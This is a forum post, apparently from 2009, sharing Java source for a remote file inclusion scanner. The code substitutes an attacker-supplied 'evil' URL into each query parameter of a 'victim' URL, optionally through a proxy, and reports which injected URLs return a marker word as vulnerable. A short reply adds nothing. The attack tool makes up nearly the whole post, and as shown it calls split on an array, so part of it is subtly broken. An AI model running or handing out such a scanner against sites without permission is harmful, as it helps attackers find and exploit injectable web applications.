hozarares Posted December 4, 2009 Report Share Posted December 4, 2009 (edited) :::=== RFISCANNER.JAVA ===:::package rrfiscanner; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.MalformedURLException; import java.net.Proxy; import java.net.URL; import java.net.URLConnection; public class RfiScanner { private Proxy _conProxy; private boolean _useProxy; private String _SEARCH_WORD; private String _vUrl,_aUrl; /** * @param args */ public RfiScanner(String vUrl,String aUrl) { this._vUrl = vUrl; this._aUrl = aUrl; } public void setUseProxy(boolean use){ this._useProxy = use; } public void setProxy(Proxy proxy){ this._conProxy = proxy; } public void setSearchWord(String word){ this._SEARCH_WORD = word; } public void scan(){ try { PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl); URLConnection uc = null; while(victimURL.hasNext()) { URL u = victimURL.next(); if (_useProxy) { uc = u.openConnection(_conProxy); } else { uc = u.openConnection(); } try{ System.out.println("SCANNING: " + u.toString()); BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream())); String c; while ((c = r.readLine()) != null) { if(c.indexOf(_SEARCH_WORD) != -1) { System.out.println("VULNERABLE URL: " + u.toString()); break;//stop searching } } }catch(IOException ioe){ //well do nothing } } } catch (MalformedURLException mfue) { System.err.println(mfue.toString()); } catch (Exception e) { System.err.println(e.toString()); } } }:::=== PREPAREURL.JAVA ===:::package rrfiscanner; import java.net.MalformedURLException; import java.net.URL; import java.util.ArrayList; import java.util.HashMap; import java.util.Iterator; import java.util.Set; public class PrepareURL { private static final int _nextItemInitialize = -1; private String _victimURL; private String _evilUrl; private ArrayList<URL> _attackUrlList; private int _nextItem; /** * @param victimUrl The URL of the site you want to inject stuff into it's params * @param attackUrl The "stuff" * @throws MalformedURLException Wrong URL */ public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException { this._victimURL = victimUrl; this._evilUrl = attackUrl; _nextItem = _nextItemInitialize; fillList(); } /** * @return True if there is another element left, false otherwise */ public boolean hasNext() { if(_nextItem == (_attackUrlList.size()-1)) { return false; } return true; } /** * @return Get the next url */ public URL next() { _nextItem++; return _attackUrlList.get(_nextItem); } /** * This resets the class so you can loop again through the URL's */ public void reset() { _nextItem = _nextItemInitialize; } private void fillList() throws MalformedURLException { String query = _victimURL.substring(_victimURL.indexOf("?")+1); _attackUrlList = new ArrayList<URL>(); if(query != null) { HashMap<String,String> paramPairs = getParameters(query); Set<String> paramNames = paramPairs.keySet(); Iterator<String> iParamNames = paramNames.iterator(); String str; while(iParamNames.hasNext()) { str = iParamNames.next(); _attackUrlList.add(new URL(_victimURL.replace(str+"="+paramPairs.get(str), str+"="+_evilUrl))); } } } /** * @param query The query to be stripped down to parameters and it's values * @return A HashMap with paramname:paramvalue */ private HashMap<String,String> getParameters(String query) { HashMap<String,String> paramPairs = new HashMap<String,String>(); String[] rawPairs = query.split("&"); for(int i=0;i<rawPairs.length;i++) { String[] keyValue = rawPairs.split("="); for(int z=0;z<keyValue.length;z+=2) { paramPairs.put(keyValue[z], keyValue[z+1]); } } return paramPairs; } } Edited December 4, 2009 by hozarares Quote Link to comment Share on other sites More sharing options...
p3tru Posted December 5, 2009 Report Share Posted December 5, 2009 <code> text </code> Quote Link to comment Share on other sites More sharing options...
